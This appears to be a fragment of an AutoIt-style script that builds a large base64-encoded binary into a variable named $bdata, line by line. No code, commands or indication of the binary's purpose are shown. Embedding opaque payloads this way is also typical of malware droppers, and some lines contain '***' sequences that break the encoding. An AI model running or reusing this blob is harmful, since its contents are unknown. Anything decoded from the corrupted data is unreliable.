	$bdata &= "Eqc3Cjw6RP3CVMU7iEi75kB7xsEnCQoCp8jANYGeAqeatabjmdobsD6Epzj450+BAzDzLShIpsFeYBaOyXe0iCnp55aQHagiJ6AaTPTvqIRn+KeSwMMOO6dPCUogClxzaOiFhhYYfcMeAEYHKDosgDHYDgDpLRUhA2wyCScrp2yOgEOX+4mpeXlQLS0AmSceNehSKGmBSwOAjwnJhCI0A7pbgQjL0xYRCeUUEioIKZOOHGm0twEIKQAKutwxOwLXf8NocDjQ0O1fHzZgoImh7oKUIDqWOlk55LsXe0cwApq6Cjl8ujGX4846fJtbctjI7FEcFrWg92tAO17e9he7GTncOiJiWpdYjbACmR96W0Y8hugCuX0gm5uzC4plShDDrCmeq6qhhKIsASHnLYdD+C/7ARSvr6e2NggJXpqLELoUIh6D2BNq4SIjouJCvvqT4izdwoWixA6GgqKnsPMXv7iIkBmEIkUzV7TQIyKCxGIwou79gADHN"
	$bdata &= "2MEIs0HCLNzk2OjejpF4puDWiAaRyNGIsrLyGUuByQAoYAU9EEqY5WjRbZOx/AHvqR6ekEjyhnwADZFh3oAAqUGOBlBRaOuNgTp4QDAfwKJw6wmQIXjkAqJmDUTSQOQITY2eQDRJopUNeSepCg+gk7NNwbU/D+VFDigADEEDSwsJDiAQeohAAxAdMMUHJ4rJOJ390ZHkBMWBBWv7/hzgz4G5muOgQcJ2ZKjIH8BZc/7T5hngSXGwQW5AAHnAEGCh6JOyfu4wQaChyTnmTPOASbTCMWGZ49c5ji4xyZyiKEgP2EAV+6HqamBg+YZaYlwEbjRpsL7665J0cXCqCaxAUZYIABHgASJ+wUwBdAntwUE+8MOBYqBByiwCfOmjiyHcQEIfEwBGgGoOlUacykajmSvpxqvgFmQAMMoE40XMCBnwYKXsLCTL2SWKEmjd4BTogkws4ap2iApjCn5PWiEBwT4IAC+NbH+v9BAMPD51hYvWxszn9/5/n"
	$bdata &= "rBejU61jsg4Pp7IaG6uWIV9fC7PJlbYCXykqw8mpA3H3MCfw3N7C0tOEsg2lpy8va+Z8ufO2CguiFhetY64MQNSXaPaDpgnbrbATl06hgrCLgg0ncixQagBaFaq15leQSgOfogoAQgwpUrAHg***V/iZvxmNRYSTegN3egmD+9hweBIegg+fniOvsg3SOBgz6BoNCxDZAA24OChKEiCiq3fOzhQoEhufoiihGh9yZSK08iV6FLBwEEMC0dwP6BBaIRoxMM+A1AIwXDBDrDOBEAxjoGvQGCPAGDIzq6mVYcoABCVbwqQDXAHsj+wqJoB6L+gTvLmEo/RYQjxhbwrQDNi6K9hc9AwwIACocjvQBdt8QBY3u1g1rm1MKwGpsptfOCQNMEAYaCqFpgAHo+vS+5GquxIDYw+fngBR94uyZBASTpgot+N2dnheB19d2TFhkVb6/ztR6nxUEkKBMBJjkxBiBFC7WgLMD6JLiBACTIhO3AZeUlAcE"
	$bdata &= "z4lvnQ4ENyAul7psDTAHBSih22lNCpkuml5lxcX6hLdeTCKoqJgrG2fAJ0wQJxnj45ANYJWWmBz0BcBbBxgkGBPgW08yBjVDZzfANRKcjsouEASAaRPgl+DgX5oinUGQDTD69Bf2tVxyy2kwgL7gAaZdncTWngd1aAU+NzG9Eye59QtMMK6uDBe4E2fao8qfFjiI1NSVdZYKhhoL1/9AAG1txVZWwYCA7M77q606BHKD7Bbo7IGB6AQBXtYIUukowl4dcsiIcE486ZhCKug+PrTKjoOAE+D/VVXAfHzofn7o6AX8KmE3cHwKVOyChITo/Y8Y4O7pi4vqPz+1F2BVkINNX4GdyhY1fWJ85754BIo1KcAQXsBhsDbAL0+9vYTQaoSI8zMHKDTs4n8KgejpFOCYshHdgEaB4NkA7VKEZFgEhnYDXBuyQIRMfCIuEMAJbBE8BDPAgCu46BAMBhzC7cTZhkzWCQVVAL9zMgQQf9rakMEMSKCEU"
	$bdata &= "uSpKrQPOAMGBAeKsoYOOAPOCioKKtID7O4KRtxAGeDEGWAiDAoCGHAGGAYSECRc+ORPFOfni4Pb3ABCiTGn7tf8nAEGfAkGABYQSAFUaMDMtGV3gFfEwcH0j8Q6710Dvk8Yj2QLBFqTqt7dwsJMWGRUZpE1OHFnkhAKFibO3KQxgRaO5OUEvqXEkzXwJeKyOycUEAQRLpwT33IOMSYKcMKtBwc2DnDaJ5wgGwrkPjDIGgyGvkQAKKqqwu1WAwaTVQuo7gZQkNx8cORhwDsD+5opAK0n3in8BBEsA84Jy1s0AgQYOAL3JEEKSoBNgMVM399fm+5YgN16BzdfA+zrQUPUmFg2kTLJCQ4v1IRAWA0C19egGAUD4NoicZz43S00QEyI1tYgnRB8BFedYAO4AavS5lqbjkWCei0A1HrXnZRs2EJCt87qenroz/UH6ODpa+59fefmFukc4Xo16vLg4tK7XgN27ODsamrMsYYBjIRMkPuDgPcu8n"
	$bdata &= "9/6xAFfOpGDHBtcHbtiHboh7abdogK5uZra4MSNh1BgF96Ln7t8VV1CTaMfGZ9BVIYYo0Yv2FEj9kBruhlycm4gHAFe+dVrwGe6H1qhnKC6FIAa6yAEF+4PxMIrLB+BIiK6Ap21daeLaCMaUrKywVqzc2Wv/tFFmfJygQ1ymnLuM1uzFIFIi9nClG9vgihlAtAwuAGDDBOaRYwaUXHBBIFeXpqjmt2z52fBGnKypUjCgVF3tndsi4QskBr6YZW8Atp2GcEUzJUu7sTnhjYoNeIOSVeJoUbCuwAkqDpWpjiLDpki9ggAQx4BQD7BzAgMwwLDI4s8OrQ3a2tWGSQjdrOCW8Zrg0aBLhl0hiBIjFKuCZA9XvC2HAKZoJsPAVtYGza2+5shCgKHDs1HeHg3V00IlJNWlYYMBDhgQZgJN5vwAL7AX7U1W1rlr1h915ujoNsHQWhXGHPXxZryMluygR8fdLS55YTTggUHgQBDPgA+o3e3iReB5j"
	$bdata &= "0iQkiGUImfLwKVesUTihhhJTE3g89AT4RP+9iw8RswSjcfIh3v33iQ7hMLwkC9o/AFl16z9Bc0AFAZX2dC28D3HGY+C8vrjoE735+7nbT5TIUFn17e+gK7+pKgOpx1Ovy6YSE7Eis/zrt4Do6sVoNcBtTjoNe5Xh44kDT7jbWeeiIgmru7Th0CWAMcYLYDLZbAvUW3jk5g0Z61woCX6p77u94xKJnatZ3CgR2RFPA/inWar9hMa6ud9raeXt2HddYemrYfXxqBHoiBpymWX4WCuruADNrU6B6nXpSexwFecEsl1PinlBccABq1ObAghlYxQVwSCQT1EqYMlIDAsHOqRiDZ0oYIM48qNwKJxbEXtTXDvU+8QkDLQpSq0IOQvz20HhEOGFQrCYPPclO+jlSBCnnAG7SEBx51daYZBPnhEoSIAROrOGdCAQQiYEIkgGZARgLBhUQDGAuvqme9Im7CsoVL2gVswM2HMuEE653tCWpqWLmCJ1I"
	$bdata &= "3/oVMf6U5bdMep4WK5GPJxkBJonq8SIDHsxylrGJ29yNgJM+FS9Q52FH4BMnXAo+8Qgo/C0PySRzkyiT5eUES3zSPR0KQZfr3CwYASaWLa2tADDCKKC5l7nJWoapqd3IwGmuf+F2dup1del3BATpfxWgKWru7ATq7H9/7YTrCDsQ7toGEApvUuk7O7NoUmvexMqDBnbdeXnt6wpugDZA7O527nCCUOIc0Rbs4xY2Aph1DRLogj7cmVIQbINb3VNU9Y5xGHfv8HS6cjhyYq1GWHMKv2FA8AVA4Deysnfguq6jNR9S7O15dxB0SHgWgGkzAe4LdYh2a8dkbgZ67e7ddUx5QAJea017eWR4LnjRUGEoZEiOMTA6jBsEVzNTok2pe9Z69tYRfy2IKWDuCNdrkgEmFiQof9D1X2CACg6/Na+vS7u79qSlvR4ugBcF6ZpkUhYog2oZcLcTaBwWSrq6ZKgwgFvfHCPqGPTV3TEYGIGHZKAeoSlxA"
	$bdata &= "PqFkIhURGoNgoEd7luf8A8VN8qYWecSAFLIBe6QWgsiwHjT08BnYQQ/EXHNzU2TdghWq0EiUMItwZGuNswrIn7j64KL0dEUk/rsBvgtMYy4ZAruW2EWW1UWvvWtAe4ZQ43AM+AcBgSTRbGc9LIRClz1c0CIBQCw1a7fIEZKSrhxcdfO73L+GWEKcHh47nDvsmjey/8/QQLCCuntRAFej2XsXu4oJDJuZGNjyHaOyM+fNZD5g3Bw1XNz63l571h2bYB2CukEg7L5DfADZOt+fuz0gmVlyVAEeGgSXx+geddysHDs7W5zau/xbxNCI16Mv/hW0ZpxuOPjkE8Ec+52UhrgWXsEc2p1dhByZDBNu+cyFnUiEHZ0u2PKDAYX3XYcTCGeAefs7SoKUucDDAgRKh6UcOIANmiuUogo0dZRl5fhnj3/gdYEfug+7HqSSX/AJKmpfN/gBCngrUnfNxx6gnzc3YLrVn2SHil9roPtF31YuE8YWiNkVP"
	$bdata &= "IbBI7BWwb7N4GEdw64AcqUBwQWA1LBiFK/EgEDwgAfNmnVCBhE/1BQK3FpvlK3nLhohuDgGkKHJwwPIP71VjKMYIBJBzgcHgDeuiNc0DFFxMGtX4O2GnfpW4/A0dI5SXPrrTM6HEicFphduAhpHBeMbrfOEUUKQwUAv8CtkR4AhtzcQrS0paoCHMlZJYDwZIdK6mre1fjL2ut0dO7svO/legfosPBxEO7tAQRohBBA7YJqQDLCiFhAnxkxwIRMsoNiYsp11rICvHVq7GTtg5rsBBvAiHum6oLi+pR3hBFN6evo4+E9PUwpOHSCE92c6ZkPaurrawRsiAuxYi3aBFC+P2G3JoFg1rK0+m8EcO7vvzV3P3Lw8RHt7nNuanLg4V/IyDozQHYcI/sKBO0GuGPddCK4OgR0b3vraHBvunEuZs3NZKxlzArM7nXXIiLOKBfKLswK9u6970BHzApmL0AQZ1JTsQSmY+haf3YDbOYFlnju73UE63V"
	$bdata &= "kzjS3E3rX16G+aINm9uy6zBFlsoIWZhAcoO5sC2sQZxcLHEYWoVgNyBHAU39Ak860eb57BC58STdAYEKuNm3R0VUnNb8ufOzseOfoeRd6PGmACwWAOrOzpoefMDcufOrrD37yUgCT3s7Pvn2m+oB2DGfAElKBfIjeGuABH+4SgvdWMY7WAARnovetO28KzWbJygQHC4c7dgJmOh1qOgIB0FtnFi49yggngixWUX68vCG0Q+jECINfxCACqGxfCBgaYDoMTVCAYRbCP2cv4ZxSS4hMxC5Tq0kOOhaJWDS4wAyBScsQt66QyOJ8heLiNjKT7iRAlLJkt5l030kKKBzlhwUFAx6BRSRvWQOeYQaIUhl0hs7CijE87L4AqKwDBgsjbrquv87w8XFxvlOAryZeddTvfOrWXkZc7QTo7DrpCkzgX6/p5vPrNzf7XJ/92Ofn9INOTr1vIgRtbVJYG6C9lO4W6nCa66YhS4ADXu5xssD5GcDM+4I4"
	$bdata &= "OLIDFOBTl1/uXe9Eze9naD4EFmzCTw0RFgDzElcCJsgKYl5u2dpbU/uzbTQEbvHybgprmmlqbu/cBNNvIu7wauvtbqBoUsHBCvBsAvtujgpvOnDP2l0BX2+4KHEiBHBrBzhrNG3cEPpsZG4WzNeAOwoEBnIpbfuAM+AEDAoBcmQGaAY8HG8wjnHigOnO8I7sOGQW1vwMSNw/GAR17/BT8BP2cBAhdQByO9OJs2QQRHeaHPcT9yQdCid4EHd27RNXBHb0QAoiBpREu3c0CnmATjrt4D92iHYvCdehSRZ6nkTpW3ZPuih4NCI32X9BNzpgx8fNac7OergAJwaYBXco8tIA92ygRi55apSFgBInkjQeYZ2qATZ9KAB5HgpgPgJuMD7s7XK3zg7ufzQEQnnn6EkPMO19KIATYIAHnBwKE+ID3zczDAV/HYF24OCw+4lwPxWBZEAKpACfM16/LKjhULQUH4JJVsqBpjRfhFqfdBAo3d6mSSYZo"
	$bdata &= "JwqEJNMepJAIzoET0CoRFOL8XoW3LJjBDxVhBLWTkBqhWTw4daz4AJhQ2645YCFATeHKPpigAGyXujQ0GGcx***OIs11x0DAJ6kOzu0pKk6l2rubobCBXAmV652rRbsCu4oCuztzowYwAg0jsq0JDaZKABmZrZnbbErju7u94Nk8BYESrQCnO9A8SjqbAyQKXF8coN2h57EA/RkZL4TqiYowF9n8GQwVU3P/gRl0GZUZhpGjAZedKy0imJ9DWBx7mk0aJ6jA***WGa0Cmod2f/OahAiae3vYcvLPEbgULMBzq9waUbw8WciTAQDHjCm3SU2AWftWWkKBGtSaugEwNkA9w1oLtAQBAAD3HsHCmtSaoB7d9rQoG9YBSI2wADXEms03IgcNjoYiF7/bUReAbLsARMRF+72HHDab5RyDQRxdhM2wBM+7hA3wE/8IW7p6xVwBNCJe6dpUnNzHRBOuwbCCP9yTHUMuDsnXFLEHCQDbAADitwuH4"
	$bdata &= "QwQg903t64jASoqgDeN5x47loGPAMSBHlIuTXAmaBSEHYk5dYB3ASD4x7dB9i4ATolebIyIHunUnsRFyqT7gHfNwcEIxuBGyBSUjkD7h5wCiUKBAbiBhgBRABgxsYj8IkH/yEhjGDE3QoEvzhxrwuHMpoa3LNgByTEYRCEkEhKlgJKTbImDZZMgugWfkBqZ9Lo6BwWy1aAhk/xO2h90ICC3xrgSRf6ScAAJ2UFLl4D7gFmHigBCgYm2N07HC6BUkCI4AVlMA7yBfquVdVJwsZtbeFrSfWnqlZpgAXsbGwkYbm6mt4o7dTt8xBMoQEaNPBw1hCAmsC/2uwxMa8gc9ZaNtyDRuRq8QSJWHwqk3nxamrr1lZ98GcdOkfvcFTtdqaKYOwAfO6DbfOuz7TdX+zuY7Zk8PFlGEDhQmEG9F51R4HUnupbhE6+v/WsDfDCY5Q6ZEwKZUa3pv228vNnEGZqNEq8vD6AAeytBmRPXu7H9IDMAAUB3WS"
	$bdata &= "0Arxf+PDyBGbEZehkjtm1AiJoOmpMiAVoTokD7GRMEn4WIDsb4CIi1gQduAfYNQxpImofChAi458/b9nav5kBAxw29KhSWQPO7gpvTBAEBmz0d4BrwAQMbnzvCljihRMnEHD9mbkBSvYScO/wF9hPiHQK+A9w1muAW2S/1x5xNPYBNriCDEABcHymZ5KdciIuBG+CADcw4D+2tqJCcAywu3eYRLi4c0ZeRiStBDDgBBj13cBp1xhxHOhzPwGfMCASD8AR+JYMSVZvnRkwUh40EEN7kp27Fh18Oi8E05okMBYAKHZMek+cA055ExYt4B4ZuwvX2L97jn7CCDglPjlRXCMBAV8bEi5ACSLQhk/shOoOfu4ge0oZuYyFeMtpPvGJgQyWCS1TywkDMAJ2y+JqHFJcvEO3t3jiDFDYAAQaCBexWVtQ9szKLpsFziiB3AFngAEADAQoIIesDH700lYrBcBJQUyXEcLaws7fDWBSvbwe3nD7MsJ0"
	$bdata &= "4PJY/u0EDbDciOhxcfF27GXEf/PvKCirrNqDqVxWgLjgZBpoyEyV2YgKaixrgx3g7AZwgkAQ0PHcO2QOWpRI7ScnqoKZf6ACX2Lz9F7v8F8BDxXgBGEQYB8K0CEoiKBjBGKzU4ABiI5dRhYVrJq/HGPy815fumg1JCUUgEZsDG/AHZ8RUDBl8vQAYu/xYpxdAZ7vY19iZBxMiKIGJGE4YkoWM8Ac4AT6Zx4onTXAgAwGYzQKbQIs7RZkKGL7aRBoe56ZAVooEWPs7Wo6jEQFuI4QZ6omO605Al9lZ45qXtx1IjsKF0RrIhY7cWdG4oIKFhtwA9wBDAT0BAJc4h4HKP3veoAbYGzEiHzY2cCTPrYq12nq7CLvEuASt3oE9/Um/gAnLCtn0NAH0rVgvO21DLgXAnhs09RrTCQDbIAB0HZeJWP4xNgRCYHude9JLyhvXsJM3t0A9ljt3OIiWAW4e9IDAR0QCrgLJwb0AxAEN8ADDBI34gTpC"
	$bdata &= "7oTCGvQ0X8PwSE8L1JZjEbAgAz/hEEDAlnaPcATb3w4srJ8Dxk4DjDABPTocTwKMAsirh5CpJPuqyJkgIBVRXwt68me+Jrxc9bWSrKE+oAwIxjj5AqYhfvo6AgmqqocYSIZYFI0Zv5QSi7jfN3exCHA/xoEXKOj2jMzsNmreSte6QTzZ2fw7vIKJFyNeOZM7/g1YgDrHO0Eju7sUgNXfvJubltbxq5XPofEch6CNDRlZe8DPOvQZGRU7RBe8fSAZ+0R6V7yFojroezPbmqICpTrWlrFgxV1DNEfWAxb8lp3tQIURF5wWRZdAk/AwdX09oon+mre31ocYPP1WiJc2zsBXhhe8fNfFhAEYShm1xiJTNDYMnQIAnR8KPQSENhO5FzKzgdw9vpg8fIRG8CAY91jMC401oC7sy4EFiIMYVINyB5wCgcFJGAwwMx2UjRi7/oHdgM8wWQGCma+NECl2xN3EAQyHEO4uJwTCS4/qQ4E7t4TBioyQQ"
	$bdata &= "oEgAMyAwYXHgEGZG9ACxEAeAPkhBg5lFjrdcKJnCEaJmqYUn+AoAFJu7sI1z5hd8AScHwJCSMNAxNn+eMGgd4IbuTlMh92k0xdECLecqwuoAH3CRUQGGowA5QYTB484gaM4QwGBIEGEyYZcAQANHLCSe8zBHEvDs45cd8xECwXCgRMMuCOWpSyu0lrSyNxgnCslLDcMRDe8Pk1wEBoBnBk6uxyiaQA7usLXsGIAuF1NCBMQemccDnkmA4EIddvPR0ldIArAVIYiEFf4hMGfCskG+4WlHAOiyJwcyduAvB35ucgdOjpAuPPgPALac3NdJ0TdwIYa8/QMiJxkgEmEAyylNTEL8bqOLGyFgBEhrmxp7ouplJERUW51O67uu66gPMKBLbz7O5nM3MjzmfuZG1t8igcqALEugS0LOwT4CQGRjreCtCUM4NERGrxcPOJU4B2lPF27DtHPEJm6eOUjnA7ZMTr7rQ1NYOnGqIJ31ceBHgBmq5WGlh"
	$bdata &= "aEFbu8FxzXIUZZNBYLtgKXa29afFZdlz09V0EWRZcwljW49EczEDLSIoH+GMNx9hPwcH6WcAB7F74WAr0XH2AAStfGCVa4AED2BDW7hPAsw8wJCte4gRftp1pZzDiWGEQIvFb4gPOCbtdHJoUChK8aoBdYC6+NmDM6Og4pk5Krtb/z4BPJKkVBgRkAE8YcGp4RZ0kOMAMEsYKOREGnNYQJRqMGXAmFgQSC+CEEgYe/AhKAL0O7mSwWAAZkGL/N5f4xNm+dgQz/WgmgEkQ+2hIUgeTBL5YVukCIlE1qEu8vTlxBjwpDAQJE3A/YXw/aKDfMOCcSBQcGIlH4BEtP/3EE88mESADauCyb9kiFj0LHHXA3zIAN2/wEvV6ork2Cu4amLe+cNgOUb+BoCqrq1XQTnrABwoWUS6tEaGfSZFccuhwlhrs6zbgJAofCsEkR3tgymJggtqJYxC0aXAJcei3TCJJUOsH/AkY8V7GxgcHfMKAGC0YN5IA"
	$bdata &= "b3A5srI9XvIcNOBJdpo6QR5pT4CIMux8zU8QcFuJV1fFfQlwpmIGBEzg8AOcrqYQ7fHy7nAOx4llBLQ06tThBXiZaexk30BAtArisUOfg2FhKIj3DnB26O8FcPDECPDM6I5w8HFRKFx76QTdgp96N/8/VQ1VnFXEWPX2ClcVVTzrzlYcClLiVMJZHc+0mSgFWC5XClseSwQDINC9vrQQ00c8VmfMv1UQdwZ8AOhb9PYGEApwAqQAXxAE2LMGGB4GW5oET44Bt/Vot7/ZByRIqQ1d+lgBrOoKWzxdHKbB12mNxArBzD8hOFKiG2Hu8D/AACcOBhlq10wuqI3YhKhlFwI3WFooSGnX1yQn7gElBCAY2QD3EQT6CwOcMIxB+BQYCIb3ACUWUYHxIRgxRl8NuCc5JjsQGFBGAKMAX3O3LxMQeJIramzV1uAeggEAXnzq9y1HPx8Kc+HiFRgeDlZgacLllrswbu3uBbyHCUhRi/Fz3yEc8IngI"
	$bdata &= "SQJ+7vlTTZy3Nxx3d1zHAFuifQb/jBElNK4AHbm5hBGqwB2AswB1RUGAcW21B/A3tXU8ubwZmb0CkbzY2MqZMU6rvAQoPPmAKa97Bzuau8tCyfx7mBgyl+DNNNugDvAXl5Y84L0fAPcANaO7QrElOJOM4BZMvt88KKTOCVsgl9eBSgaUPhTIlF6z1rHizhU9vdPHlIWUSgEVGLd3vn19lP09RBVBGHn6GHDiMURB79V17QDXD4AmlNXcDvtphG/Vi6sVcRAqHNAVRlepljFRiqw7AUNXIJJbq6KEQhGTpSkqbCiTjgUIFh0W9yCmAGfLZbXibv7xBsEEAQgI771AytAAQY9SJAPjVDCQXg0LHP8gAuTnCAvCjsxBvsNZJqBIGDtTrzlmu9jBRKwXGgFBKlTjMDLIVkFRIkj4zrK8Mq/AoQYwCZGXAglN2RmZMqEQwIceFxenPQtb/0bakMlECfSn0dt5ufsWCfWLBzxixvN+gjcCjlRS0"
	$bdata &= "V6AgLxaGpJbh2B6Tg2nFh+4h0U6+wmTwiAtx44bxgqywDM9AiMCNisAVTkeoiFbGzhhmhi1QjTOjD0EO/E8oWMMOLmZOLQcuhsAHYECjBgKSX7+OxkM4O705pffF9f8PCI84J8h+5sgHYQIhBIgXXIAAxm74MHGIoAX09G9J3p/f72UPX3TPHzEFH2+BZLNAQQ4db8HE/z9VFSKGTe3lqx2LFUEGGVAabrGb/AwU5QUjimG+AB+gTdVanOgA4ZUCo6DEEchukcTtbnBpg7MVZi9PVWSIjJKGroVIZNl6xJBoQqClzW1cvskxFa3AUcVKIqRLE6dsYFJ0y6S01MHCGZCeDWNvSOfLRpxCcdW79hxF7BJz3JL0FPqRiBGwQKLdKZ5FYqFhbjREZmTMsuBGWEgzC0fqDIvvW7YGTQ0Gjp6iULmEjuQ3EXvBBwBkEhDirEgAxrEPtpHE50ywwkaP7qiQI0t0Ic718Bd+JDkRRq1NUfgkmWKwo"
	$bdata &= "EWe6kMAJRTCiUBgIluqhOKOAUoFa7XQ04tY5gLS2t5vtydZLoyODxBfC9bJcRTO0K1AFLgAqm83cQDOCCqt7iZlK5KWRKSIPq0awYhC4K7oNdQHbXbgD0BBbufAQWBWjaQ9iO8fLu7yACjDXhg181QPP/SvT2SPL0SfP1R0tqcmdq3phI8fJNSigKBYBErB0Mzs5h054rQV/+WE6CSsd0A1hMpu4E3U52AxpgxAZOAU5Aonf2jmGoW8zMXLgEEF2wzN09s14EI1vNzQoiEQSpGeTbL01eXVrPriKj4ku/U7gEVPbXMwWoUhBRDtfYX5ouu+2eXcwEds3OFgsiazdm7xAoXqAXLhzPECXTr7kvImDiystOpgEUOCo/WDI0qTpggGo3V2YNMfAnHWff4DL3bA06AQ1MhMAb4Gje3+4EV/zO1FLrgvTWHAQCZ8AYgSQEQpxCOD5iRow7waDg2dphZmBUSBAF99w0gU4iz85ey88Ku3cneDRf"
	$bdata &= "qAQWLl9SCgkBkFliNAVW3Eql1PJXPyoETK23QuLQhd6cfS1o+lmyZ9PUZu4IdMJ14eFjJghkJz4C510KS2Ehl1sfgjU8aDjCLcFArq/reBZMu2HKZUljdOhZT+uTNh0QHa0u6OkvTPpF3ARvakBaBtjgmlT0DAAlVIBqvKggKECczKsgCQEEHP8XoEsAtu1e9Fxc8WFh9F5e8GHs0H2dYfjvBFplZaU2Ko9iYu7RGIzMQYmEnoMHuKaJcGTv9QRxgKfEAGpUXvJADz1L9Qpq81XvEAeVPfvOg5+s6901RcJK+PkER85GFtrx7vwERfP0HARPlkq+RwRIxWFf9yAzYID56AYRuQFjMgbdEkny8www4KxLxBAqJDzys/YESRBOKARN9fZP9/jAgLD2S0ZQCwA/YSI1EkxoTANN8RvAAR/6BGLk5VknEpG/LE30kZRQ4gpM3q7mvLPTMwoETi6IEApQmfQJTwMhKHeJuycjFgr9CklnkhMgH"
	$bdata &= "ApEhhneIiLw8sq/wLYPSCVSNFHvTJhEOjNOHBYIZWR9WAu5DmCdVBJdTVYE7lprDPbO3AQWWfqBt4yAdTZZvjIx2bXT3hxY1lcKWyIuXIDmbjBc9PVX9Fry851JmY1aiBFABBOZ/cQQG11MBcAio6MmZeBQvwmBI2ASJpzIIZydcAQRWu5HZucQnAJMBB1e9wi4ZTwnBMbCMAJFaNco4JBCHHhdGWCZlImsJNFgHY4LY/jrXQgcYx3YW8fIL+KkbzbuIm+4L8KJDnUQhMmWBvoWWcIDxPZPvmEIgkl0skxMvlpagOsSOcZ22vEQaAqHa3bIQuQK8txLrI7j8EjmBBO4EQNwXkNDuC/yj10Dg0tLvV5e9ImgEQOY70DK8YfOIRv0EEKUxowpMUDxcGaDz3wKAl9D9vdFCkCeNV0dZkAIQ0EKBEOsldK75lbq6zYayclzQIBRYV9NiJp2APpJmkdD7ODSoQYGSB8cOwMOMAwkGEw0qH0DPB"
	$bdata &= "BKFgVI3EWJpgC2/kjzLtZMRjjBE0DYLgpKHhwDnLCfCUwiDhLAAAMyBRgGMgQNGOIAV0ZsgLMrv0wiBOgLBphmwEpOUksqgHuAmU4oDRAKu2v6GUruTb6gBScOcE8pEO8mCSecuAQmMhEQIkPkv2TZAHcA7lKmsrhMBv2aF0/Oysp6ZQ+FgADHWcjJ2E+Yt1TQUO/xVjNXEAW5dQP6xAFsVK2NwDMEViFFyu7OJAQQHCP+U+vuTnAQGAQWBBBwzZVwVPxZ9PVYZMAAexsrClooBgYcGTcAWMfHvwCx8IQTPkR2AAMMMAoYBifeemb7ghEeFW4MMO1cgloTmoC7ALdsdtTVOLMQYkFY14swwOcAWe5d8fsCEOBZVV+40XDgmlKYZ+Hi8CKGQ2VgPyx9gATp+mno6YAJUEvSOs0GBVKC/bXmfwE6zFZW71dX71pa8vUc8wGOcMQE42Rxwldo1+3Wa2vpMjKzNpZZW4NYywRwwHkC3PWCcVx"
	$bdata &= "c8irAmjb0OvLurIxYBeGI9OPu5INVhYDBQH9bVVHTQSg8XEH8PxA+9EuF3532BBBZ3N3oowNaEGFrojfAT6ZMwMDoBEF6G8CVeApCYPn6Nbiz9rr9Rf6yQtYQBNc+Zw0kROIpBUc0RRwwrb19BUI0SPj6SCJElEUMMOAG+gQMBgc0JcwoUk4KRB9LkTE7EAtcv9aaSNeAGEhMqrJIu2eAAwESCkvQuAZ84jIFIgMSpDPtAPpMUkoE8SQT6S6qpjWJAe4+FQQo7jNwZNwaXt7ev6aEmVUpsE04UnADBrj39B5c5eYwiQAxmJpl/N8EFi8/s7Ng4+Q78YBPCQEsUe5xbj288MSjgSoEOPNvOQJDUPLzFt9y4hFFAj2A6XrmU/T1EFXmUJGdATfuBAYcBbY7Az4VEgoWBPFR98gwhSjEv1e4EJYbYCIeVfLzgG+55XYSJeCeAfcHFiocWSLGf6bEDJxGFmXm5ke7uwIXBowsiQuPQ4BXaCR9"
	$bdata &= "CAM8W/pZGMAl4ApMaxJmjRxMJix7FsyCnDxnBafwLyJ7S729e6ASESwBS7EA4b0Q2Fi0A5imq8724PTyXtYZ8XIF8uIEKTRdIc3g8dX2sQG+l16DZWXZcFDYORwwMoIExAGeQ6a6CjYW8F7WsyNM8eIEpu5IFIw1zdKDQ4oqfhCVS9A77DrEbWY63jkFPBZXzs6xFLFUBmEBcHtBYL09mkL5+zJ+Zw76QAoWS+ztrr8gYFS9Su3vQCadAQV4BEIWPkIWXe+aq9BCLBD3CgRD8kDSlLhr+kMiLkIiRIAH2A1EOiINCSU+wAYTQiQi8AFMEgTuW9TUAANWaz8MAIC9EWDu+xxD6MDeAHYqau4ERojSJwwwGAAn0pOcOP8gF3cnDngpGA9LRoEj42dSEF/a278Y4EJBkiBX6Or6GWjvnBQEEEn0PIE4CThfYyhAF1YMujhkTOELkwRAIxBa6AgeDkPmtoBYtLTEEwYqOPxkZ2+dLhgKBB3se"
	$bdata &= "esIXDcKUBbJXK+THfIF/pQ4a8A9BQQeUYgEZPxJDyUpYtbWHOA5cb84HE/vh/CABwcfU59YbsAMUO/xCSiEG3AKGGTj5NpGfEB4Zp9NoD4WKUAkXBjgE+aAlAn0AEoCDQA8KzIQX8Y7quwkJ9zAMhwKd8IkkzQiGmTX1xBsdQp7AZJ4shb5vu4qgJ4Q4tr0Vlbg9leAV2v1EPHsBPEErA6dAGooMPSxvuhlT+zgSbyBgc2EKBYgMINk51TAkQ9wA+4EcFhY8x86whJz4lvTwPZnjhDuTEy9gyPMwqKbeI7R8VR/O/v8O/r7OR4KQABKgWI1kUwEuGGqAAYci2xRrajpKg48Jjk6hj2gWteHycDU1X1Z2Nk/yKmePVE65gQ+NAo9JD1TA+wEPxZCPWoKQABTM6BAO2B8PujZHcB13EHO7j0cms60A+wEPygYNEMEDHwvAfUKPyi4uKam/br/WtjYQJpEPhwAO4ABDOJFFgOc3Wz6BUHQyi"
	$bdata &= "MTBmRngAwEEQA6a4ABDAZHsgTeJ+5MKAQQORBEAIsMA0i/YMBVwiLQV8vMEvoATwj6CPpaz88tIiQMsEdOXInVWJBsWczMDjlhkkkoEAKDlwsO9loCqOSEE6pdGAga4H7injsKJ03uE064QsD1ERqRBviWMjfi/t058SQLLBwKkz7hxBxKGy8YHOjEIFEWgPoQvgz/WeadSU8dRgoWTK1nwAD6EhEADg3wNk2sVBFSA79MXtHROLKzGAIDXIAodvDxrfYOiWjQX1hQG2i/5U9VX45W+JRCEOsFghNXGqRk29sOQ7oTz08mX+TlUgDclqJ9gBWNAD1gqHCZ9uA0VbCIV9fLsvLO8+yBm5Pf6Fxc9llZ8fJiYugDuAy4vOxYHcBaYIM06XZS9tkz4qwE9Y4QvhDwg0bB7kNbggpMEImK7ewuLoPvHRtVvPJLurpT0D3J81kAOQYCDMSzs8MhgVbFPWyE78KLNFff4EDY7u9Y0tPJVF0hPVH"
